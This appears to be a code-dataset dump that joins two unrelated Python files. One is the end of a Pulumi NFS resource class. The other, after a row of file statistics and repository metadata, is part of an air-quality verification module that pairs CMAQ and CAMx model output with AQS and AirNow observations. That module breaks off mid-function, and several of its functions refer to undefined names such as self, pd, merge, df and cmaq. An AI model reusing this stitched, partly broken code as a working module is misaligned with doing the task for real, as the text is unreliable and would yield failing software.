:param pulumi.Input[pulumi.InputType['NFSNetworkInterfaceArgs']] network_interface: An `network_interface` block as defined below.
:param pulumi.Input[str] plan: The plan name of the NFS. This must be one of [`hdd`/`ssd`]. Changing this forces a new resource to be created. Default:`hdd`.
:param pulumi.Input[int] size: The size of NFS in GiB. Changing this forces a new resource to be created. Default:`100`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: Any tags to assign to the NFS.
:param pulumi.Input[str] zone: The name of zone that the NFS will be created. (e.g. `is1a`, `tk1a`). Changing this forces a new resource to be created.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _NFSState.__new__(_NFSState)
__props__.__dict__["description"] = description
__props__.__dict__["icon_id"] = icon_id
__props__.__dict__["name"] = name
__props__.__dict__["network_interface"] = network_interface
__props__.__dict__["plan"] = plan
__props__.__dict__["size"] = size
__props__.__dict__["tags"] = tags
__props__.__dict__["zone"] = zone
return NFS(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
The description of the NFS. The length of this value must be in the range [`1`-`512`].
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="iconId")
def icon_id(self) -> pulumi.Output[Optional[str]]:
"""
The icon id to attach to the NFS.
"""
return pulumi.get(self, "icon_id")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the NFS. The length of this value must be in the range [`1`-`64`].
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="networkInterface")
def network_interface(self) -> pulumi.Output['outputs.NFSNetworkInterface']:
"""
An `network_interface` block as defined below.
"""
return pulumi.get(self, "network_interface")
@property
@pulumi.getter
def plan(self) -> pulumi.Output[Optional[str]]:
"""
The plan name of the NFS. This must be one of [`hdd`/`ssd`]. Changing this forces a new resource to be created. Default:`hdd`.
"""
return pulumi.get(self, "plan")
@property
@pulumi.getter
def size(self) -> pulumi.Output[Optional[int]]:
"""
The size of NFS in GiB. Changing this forces a new resource to be created. Default:`100`.
"""
return pulumi.get(self, "size")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Any tags to assign to the NFS.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def zone(self) -> pulumi.Output[str]:
"""
The name of zone that the NFS will be created. (e.g. `is1a`, `tk1a`). Changing this forces a new resource to be created.
"""
return pulumi.get(self, "zone")
| 41.593156 | 165 | 0.611985 | 2,702 | 21,878 | 4.799038 | 0.069208 | 0.102645 | 0.086373 | 0.076348 | 0.872368 | 0.861032 | 0.838667 | 0.830107 | 0.819233 | 0.812601 | 0 | 0.008715 | 0.271003 | 21,878 | 525 | 166 | 41.672381 | 0.804314 | 0.346421 | 0 | 0.797945 | 1 | 0 | 0.079738 | 0.019954 | 0 | 0 | 0 | 0 | 0 | 1 | 0.160959 | false | 0.003425 | 0.023973 | 0 | 0.280822 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d716f1f9e597b3f3012a1050acdc6c60680dc69d | 59,344 | py | Python | monet/verification/combine.py | barronh/MONET | acd72487c7aeff66d89f87fa663a9c96fa9b7bb0 | [
"MIT"
] | 1 | 2019-07-09T19:50:59.000Z | 2019-07-09T19:50:59.000Z | monet/verification/combine.py | barronh/MONET | acd72487c7aeff66d89f87fa663a9c96fa9b7bb0 | [
"MIT"
] | null | null | null | monet/verification/combine.py | barronh/MONET | acd72487c7aeff66d89f87fa663a9c96fa9b7bb0 | [
"MIT"
] | null | null | null | from __future__ import absolute_import, print_function
from numpy import NaN, sort
from pandas import concat
from . import interpolation as interpo
from ..obs import epa_util
def combine(model=None, obs=None):
"""Short summary.
Parameters
----------
model : type
Description of parameter `model` (the default is None).
obs : type
Description of parameter `obs` (the default is None).
Returns
-------
type
Description of returned object.
"""
if model.objtype is 'CMAQ' and obs.objtype is 'AirNow':
df = combine_aqs_cmaq(model, obs)
if model.objtype is 'CAMX' and obs.objtype is 'AirNow':
df = combine_aqs_camx(model, obs)
if model.objtype is 'CMAQ' and obs.objtype is 'AQS':
if obs.daily:
df = combine_daily_aqs_cmaq(model, obs)
else:
df = combine_aqs_cmaq(model, obs)
if model.objtype is 'CAMX' and obs.objtype is 'AQS':
if obs.daily:
df = combine_daily_aqs_camx(model, obs)
else:
df = combine_aqs_cmaq(model, obs)
if (model.objtype is 'CMAQ' or model.objtype is 'CAMX') and obs.objtype is 'TOLNET':
model_dset, obs_dset = combine_tolnet_model(model, obs)
return df
def combine_crn(model, obs):
"""Short summary.
Parameters
----------
model : type
Description of parameter `model`.
obs : type
Description of parameter `obs`.
Returns
-------
type
Description of returned object.
"""
comparelist = obs.df.Species.unique()
g = obs.df.groupby('Species')
dfs = []
for i in comparelist:
if i == 'SUR_TEMP':
if ('TEMPG' in self.cmaq.metcrokeys):
dfmet = g.get_group(i)
cmaq = model.get_var(param='TEMPG').compute()
dfmet = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfmet.Obs += 273.15
dfs.append(dfmet)
elif i == 'T_HR_AVG':
if (self.cmaq.metcro2d is None) | ('TEMP2' not in self.cmaq.metcrokeys):
dfmet = g.get_group(i)
cmaq = model.get_var(param='TEMP2').compute()
dfmet = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfmet.Obs += 273.15
dfs.append(dfmet)
elif i == 'SOLARAD':
if (self.cmaq.metcro2d is None) | ('RGRND' not in self.cmaq.metcrokeys):
dfmet = g.get_group(i)
cmaq = model.get_var(param='RGRND').compute()
dfmet = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(dfmet)
elif i == 'SOIL_MOISTURE_5':
if (self.cmaq.metcro2d is None) | ('SOIM1' not in self.cmaq.metcrokeys):
dfmet = g.get_group(i)
cmaq = model.get_var(param='SOILW').compute()
dfmet = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(dfmet)
elif i == 'SOIL_MOISTURE_10':
if (self.cmaq.metcro2d is None) | ('SOIM1' not in self.cmaq.metcrokeys):
dfmet = g.get_group(i)
cmaq = model.get_var(param='SOILW').compute()
dfmet = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(dfmet)
df = pd.concat(dfs)
df.dropna(inplace=True, subset=['Obs', 'model'])
return df
def combine_improve_cmaq(model=None, obs=None):
"""Short summary.
Parameters
----------
model : type
Description of parameter `model` (the default is None).
obs : type
Description of parameter `obs` (the default is None).
Returns
-------
type
Description of returned object.
"""
comparelist = sort(obs.self.improve.df.Species.unique())
g = obs.df.groupby('Species')
dfs = []
for i in comparelist:
if i == 'CLf':
if ('ACLI' in self.cmaq.keys) | ('ACLJ' in self.cmaq.keys) | ('PM25_CL' in self.cmaq.keys):
dfpm25 = g.get_group(i)
fac = epa_util.check_cmaq_units(param='CLf', improve_param=i)
cmaq = self.cmaq.get_cmaqvar(lay=0, param='CLf').compute() * fac
dfpm25 = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
self.cmaqpm25 = cmaq
dfs.append(dfpm25)
elif i == 'PM10':
dfpm = g.get_group(i)
fac = epa_util.check_cmaq_units(param='PM10', improve_param=i)
cmaqvar = model.get_var(lay=0, param='PM10').compute() * fac
dfpm = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
self.cmaqpm10 = cmaqvar
dfs.append(dfpm)
elif i == 'PM2.5':
dfpm = g.get_group(i)
fac = epa_util.check_cmaq_units(param='PM25', improve_param=i)
cmaqvar = model.get_var(lay=0, param='PM25').compute() * fac
dfpm = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
self.cmaqpm25 = cmaqvar
dfs.append(dfpm)
elif i == 'NAf':
if ('ANAI' in self.cmaq.keys) | ('ANAJ' in self.cmaq.keys) | ('PM25_NA' in self.cmaq.keys):
dfpm = g.get_group(i)
fac = epa_util.check_cmaq_units(param='NAf', improve_param=i)
cmaqvar = model.get_var(lay=0, param='NAf').compute() * fac
dfpm = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
self.cmaqna = cmaqvar
dfs.append(dfpm)
else:
pass
elif i == 'MGf':
if ('AMGI' in self.cmaq.keys) | ('AMGJ' in self.cmaq.keys) | ('PM25_MG' in self.cmaq.keys):
dfpm = g.get_group(i)
fac = epa_util.check_cmaq_units(param='MGf', improve_param=i)
cmaqvar = model.get_var(lay=0, param='AMGJ').compute() * fac
dfpm = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
self.cmaqmg = cmaqvar
dfs.append(dfpm)
else:
pass
elif i == 'TIf':
if ('ATIJ' in self.cmaq.keys):
dfpm = g.get_group(i)
fac = epa_util.check_cmaq_units(param='TIj', improve_param=i)
cmaqvar = model.get_var(lay=0, param='ATIJ').compute() * fac
dfpm = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
self.cmaqti = cmaqvar
dfs.append(dfpm)
else:
pass
elif i == 'SIf':
if ('ASIf' in self.cmaq.keys):
dfpm = g.get_group(i)
fac = epa_util.check_cmaq_units(param='SIj', improve_param=i)
cmaqvar = model.get_var(lay=0, param='ASIJ').compute() * fac
dfpm = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
self.cmaqti = cmaqvar
dfs.append(dfpm)
else:
pass
elif i == 'Kf':
if ('AKI' in self.cmaq.keys) | ('AKJ' in self.cmaq.keys) | ('PM25_K' in self.cmaq.keys):
dfpm = g.get_group(i)
fac = epa_util.check_cmaq_units(param='Kf', improve_param=i)
cmaqvar = model.get_var(lay=0, param='Kf').compute() * fac
dfpm = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
self.cmaqk = cmaqvar
dfs.append(dfpm)
else:
pass
elif i == 'CAf':
if ('ACAJ' in self.cmaq.keys) | ('PM25_CA' in self.cmaq.keys):
dfpm = g.get_group(i)
fac = epa_util.check_cmaq_units(param='CAf', improve_param=i)
cmaqvar = model.get_var(lay=0, param='ACAJ').compute() * fac
dfpm = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
self.cmaqca = cmaqvar
dfs.append(dfpm)
else:
pass
elif i == 'SO4f':
if ('ASO4I' in self.cmaq.keys) | ('ASO4J' in self.cmaq.keys) | ('PM25_SO4' in self.cmaq.keys):
dfpm = g.get_group(i)
fac = epa_util.check_cmaq_units(param='SO4f', improve_param=i)
cmaqvar = model.get_var(lay=0, param='SO4f').compute() * fac
dfpm = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
self.cmaqso4 = cmaqvar
dfs.append(dfpm)
else:
pass
elif i == 'NH4f':
if ('ANH4I' in self.cmaq.keys) | ('ANH4J' in self.cmaq.keys) | ('PM25_NH4' in self.cmaq.keys):
dfpm = g.get_group(i)
fac = epa_util.check_cmaq_units(param='NH4f', improve_param=i)
cmaqvar = model.get_var(lay=0, param='NH4f').compute() * fac
dfpm = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
self.cmaqnh4 = cmaqvar
dfs.append(dfpm)
else:
pass
elif i == 'ammSO4f':
if ('ANH4I' in self.cmaq.keys) | ('ANH4J' in self.cmaq.keys) | ('PM25_NH4' in self.cmaq.keys):
dfpmso4 = g.get_group(i)
dfpmno3 = g.get_group('ammNO3f')
dfpmso4.Species = 'NH4f'
dfpm = merge(dfpmso4, dfpmno3[['Obs', 'datetime', 'Site_Code']], on=['datetime', 'Site_Code'])
dfpm.rename(columns={'Obs_x': 'Obs'}, inplace=True)
dfpm.Obs = 2 * dfpm.Obs * 18. / 132. + dfpm.Obs_y * 18. / 80.
dfpm.drop('Obs_y', axis=1, inplace=True)
cmaqvar = model.get_var(lay=0, param='NH4f')
dfpm = self.interp_to_improve(cmaqvar, dfpm, interp=interp, r=radius, weight_func=weight_func)
self.cmaqnh4 = cmaqvar
dfs.append(dfpm)
else:
pass
elif i == 'NO3f':
if ('ANO3I' in self.cmaq.keys) | ('ANO3J' in self.cmaq.keys) | ('PM25_NO3' in self.cmaq.keys):
dfpm = g.get_group(i)
fac = epa_util.check_cmaq_units(param='NO3f', improve_param=i)
cmaqvar = model.get_var(lay=0, param='NO3f').compute() * fac
dfpm = self.interp_to_improve(cmaqvar, dfpm, interp=interp, r=radius, weight_func=weight_func)
self.cmaqno3 = cmaqvar
dfs.append(dfpm)
else:
pass
elif i == 'FEf':
if ('AFEJ' in self.cmaq.keys):
dfpm = g.get_group(i)
fac = epa_util.check_cmaq_units(param='FEf', improve_param=i)
cmaqvar = model.get_var(lay=0, param='AFEJ').compute() * fac
dfpm = self.interp_to_improve(cmaqvar, dfpm, interp=interp, r=radius, weight_func=weight_func)
self.cmaqfe = cmaqvar
dfs.append(dfpm)
else:
pass
elif i == 'ALf':
if ('AALF' in self.cmaq.keys):
dfpm = g.get_group(i)
fac = epa_util.check_cmaq_units(param='ALf', improve_param=i)
cmaqvar = model.get_var(lay=0, param='AALF').compute() * fac
dfpm = self.interp_to_improve(cmaqvar, dfpm, interp=interp, r=radius, weight_func=weight_func)
self.cmaqal = cmaqvar
dfs.append(dfpm)
else:
pass
elif i == 'MNf':
if ('AMNJ' in self.cmaq.keys):
dfpm = g.get_group(i)
fac = epa_util.check_cmaq_units(param='MNf', improve_param=i)
cmaqvar = model.get_var(lay=0, param='AMNJ').compute() * fac
dfpm = self.interp_to_improve(cmaqvar, dfpm, interp=interp, r=radius, weight_func=weight_func)
self.cmaqmn = cmaqvar
dfs.append(dfpm)
else:
pass
elif i == 'OCf':
if ('APOCJ' in self.cmaq.keys):
dfpm = g.get_group(i)
fac = epa_util.check_cmaq_units(param='OCf', improve_param=i)
cmaqvar = model.get_var(lay=0, param='OC').compute() * fac
dfpm = self.interp_to_improve(cmaqvar, dfpm, interp=interp, r=radius, weight_func=weight_func)
self.cmaqmn = cmaqvar
dfs.append(dfpm)
else:
pass
def combine_aqs_camx(model, obs):
"""Short summary.
Parameters
----------
model : type
Description of parameter `model`.
obs : type
Description of parameter `obs`.
Returns
-------
type
Description of returned object.
"""
g = obs.df.groupby('Species')
comparelist = sort(obs.df.Species.unique())
dfs = []
for i in comparelist:
if (i == 'OZONE') and ('O3' in model.keys):
print('Interpolating Ozone:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='O3', aqs_param=i)
cmaq = model.get_var(lay=0, param='O3').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
df.Units = 'PPB'
dfs.append(df)
elif i == 'PM2.5':
if ('PM25_TOT' in model.keys) | ('ASO4J' in model.keys):
print('Interpolating PM2.5:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='PM25', aqs_param=i)
cmaq = model.get_var(lay=0, param='PM25').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'CO':
if 'CO' in model.keys:
print('Interpolating CO:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='CO', aqs_param=i)
cmaq = model.get_var(lay=0, param='CO').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'NOY':
if 'NOY' in model.keys:
print('Interpolating NOY:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NOY', aqs_param=i)
cmaq = model.get_var(lay=0, param='NOY').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'SO2':
if 'SO2' in model.keys:
print('Interpolating SO2')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='SO2', aqs_param=i)
cmaq = model.get_var(lay=0, param='SO2').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'NOX':
if ('NO' in model.keys) | ('NO2' in model.keys):
print('Interpolating NOX:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NOX', aqs_param=i)
cmaq = model.get_var(lay=0, param='NOX').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'NO':
if ('NO' in model.keys):
print('Interpolating NO:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NO', aqs_param=i)
cmaq = model.get_var(lay=0, param='NO').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'NO2':
if ('NO2' in model.keys):
print('Interpolating NO2:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NO2', aqs_param=i)
cmaq = model.get_var(lay=0, param='NO2').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'SO4f':
if ('PM25_SO4' in model.keys) | ('ASO4J' in model.keys) | ('ASO4I' in model.keys):
print('Interpolating PSO4:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='SO4f', aqs_param=i)
cmaq = model.get_var(lay=0, param='SO4f').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'PM10':
if ('PM_TOTAL' in self.camx.keys) | ('ASO4K' in self.camx.keys):
print('Interpolating PM10:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='PM10', aqs_param=i)
cmaq = model.get_var(lay=0, param='PM10').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'NO3f':
if ('PM25_NO3' in model.keys) | ('ANO3J' in model.keys) | ('ANO3I' in model.keys):
print('Interpolating PNO3:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NO3f', aqs_param=i)
cmaq = model.get_var(lay=0, param='NO3F').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'ECf':
if ('PM25_EC' in model.keys) | ('AECI' in model.keys) | ('AECJ' in model.keys):
print('Interpolating PEC:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='ECf', aqs_param=i)
cmaq = model.get_var(lay=0, param='ECf').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'OCf':
if ('APOCJ' in model.keys):
print('Interpolating OCf:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='OCf', improve_param=i)
cmaqvar = model.get_var(lay=0, param='OC').compute() * fac
df = interpo.interp_to_obs(cmaqvar, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'ETHANE':
if ('ETHA' in model.keys):
print('Interpolating Ethane:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='ETHA', aqs_param=i)
cmaq = model.get_var(lay=0, param='ETHA').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'BENZENE':
if ('BENZENE' in model.keys):
print('Interpolating BENZENE:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df,
param='BENZENE', aqs_param=i)
cmaq = model.get_var(
lay=0, param='BENZENE').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'TOLUENE':
if ('TOL' in model.keys):
print('Interpolating Toluene:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df,
param='TOL', aqs_param=i)
cmaq = model.get_var(
lay=0, param='TOL').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'ISOPRENE':
if ('ISOP' in model.keys):
print('Interpolating Isoprene:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='ISOP', aqs_param=i)
cmaq = model.get_var(lay=0, param='ISOP').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'O-XYLENE':
if ('XYL' in model.keys):
print('Interpolating Xylene')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='XYL', aqs_param=i)
cmaq = model.get_var(lay=0, param='XYL').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'WS':
if ('WSPD10' in model.keys):
print('Interpolating WS:')
df = g.get_group(i)
cmaq = model.get_var(lay=0, param='WSPD10')
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'TEMP':
if 'TEMP2' in model.keys:
print('Interpolating TEMP:')
df = g.get_group(i)
cmaq = model.get_var(lay=0, param='TEMP2')
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'WD':
if ('WDIR10' in model.keys):
print('Interpolating WD:')
df = g.get_group(i)
cmaq = model.get_var(lay=0, param='WDIR10')
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
df = concat(dfs)
df.dropna(subset=['Obs', 'CAMx'], inplace=True)
return df
def combine_aqs_cmaq(model, obs):
"""Short summary.
Parameters
----------
model : type
Description of parameter `model`.
obs : type
Description of parameter `obs`.
Returns
-------
type
Description of returned object.
"""
g = obs.df.groupby('Species')
comparelist = sort(obs.df.Species.unique())
dfs = []
for i in comparelist:
if (i == 'OZONE'): # & ('O3' in model.keys):
print('Interpolating Ozone:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='O3', aqs_param=i)
print(fac)
cmaq = model.get_var(lay=0, param='O3').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
# df.Obs, df.CMAQ = df.Obs, df.CMAQ
df.Units = 'PPB'
dfs.append(df)
elif i == 'PM2.5':
if ('PM25_TOT' in model.keys) | ('ASO4J' in model.keys):
print('Interpolating PM2.5:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='PM25', aqs_param=i)
cmaq = model.get_var(lay=0, param='PM25').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'CO':
if 'CO' in model.keys:
print('Interpolating CO:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='CO', aqs_param=i)
cmaq = model.get_var(lay=0, param='CO').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'NOY':
if 'NOY' in model.keys:
print('Interpolating NOY:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NOY', aqs_param=i)
cmaq = model.get_var(lay=0, param='NOY').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'SO2':
if 'SO2' in model.keys:
print('Interpolating SO2')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='SO2', aqs_param=i)
cmaq = model.get_var(lay=0, param='SO2').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'NOX':
if ('NO' in model.keys) | ('NO2' in model.keys):
print('Interpolating NOX:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NOX', aqs_param=i)
cmaq = model.get_var(lay=0, param='NOX').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'NO':
if ('NO' in model.keys):
print('Interpolating NO:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NO', aqs_param=i)
cmaq = model.get_var(lay=0, param='NO').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'NO2':
if ('NO2' in model.keys):
print('Interpolating NO2:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NO2', aqs_param=i)
cmaq = model.get_var(lay=0, param='NO2').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'SO4f':
if ('PM25_SO4' in model.keys) | ('ASO4J' in model.keys) | ('ASO4I' in model.keys):
print('Interpolating PSO4:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='SO4f', aqs_param=i)
cmaq = model.get_var(lay=0, param='SO4f').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'PM10':
if ('PM_TOTAL' in model.keys) or ('ASO4K' in model.keys):
print('Interpolating PM10:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='PM10', aqs_param=i)
cmaq = model.get_var(lay=0, param='PM10').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'NO3f':
if ('PM25_NO3' in model.keys) | ('ANO3J' in model.keys) | ('ANO3I' in model.keys):
print('Interpolating PNO3:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NO3f', aqs_param=i)
cmaq = model.get_var(lay=0, param='NO3F').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'ECf':
if ('PM25_EC' in model.keys) | ('AECI' in model.keys) | ('AECJ' in model.keys):
print('Interpolating PEC:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='ECf', aqs_param=i)
cmaq = model.get_var(lay=0, param='ECf').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'OCf':
if ('APOCJ' in model.keys):
print('Interpolating OCf:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='OCf', improve_param=i)
cmaqvar = model.get_var(lay=0, param='OC').compute() * fac
df = interpo.interp_to_obs(cmaqvar, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'ETHANE':
if ('ETHA' in model.keys):
print('Interpolating Ethane:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='ETHA', aqs_param=i)
cmaq = model.get_var(lay=0, param='ETHA').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'BENZENE':
if ('BENZENE' in model.keys):
print('Interpolating BENZENE:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='BENZENE', aqs_param=i)
cmaq = model.get_var(lay=0, param='BENZENE').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'TOLUENE':
if ('TOL' in model.keys):
print('Interpolating Toluene:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='TOL', aqs_param=i)
cmaq = model.get_var(lay=0, param='TOL').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'ISOPRENE':
if ('ISOP' in model.keys):
print('Interpolating Isoprene:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='ISOP', aqs_param=i)
cmaq = model.get_var(lay=0, param='ISOP').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'O-XYLENE':
if ('XYL' in model.keys):
print('Interpolating Xylene')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='XYL', aqs_param=i)
cmaq = model.get_var(lay=0, param='XYL').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'WS':
if ('WSPD10' in model.keys):
print('Interpolating WS:')
df = g.get_group(i)
cmaq = model.get_var(lay=0, param='WSPD10')
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'TEMP':
if 'TEMP2' in model.keys:
print('Interpolating TEMP:')
df = g.get_group(i)
cmaq = model.get_var(lay=0, param='TEMP2')
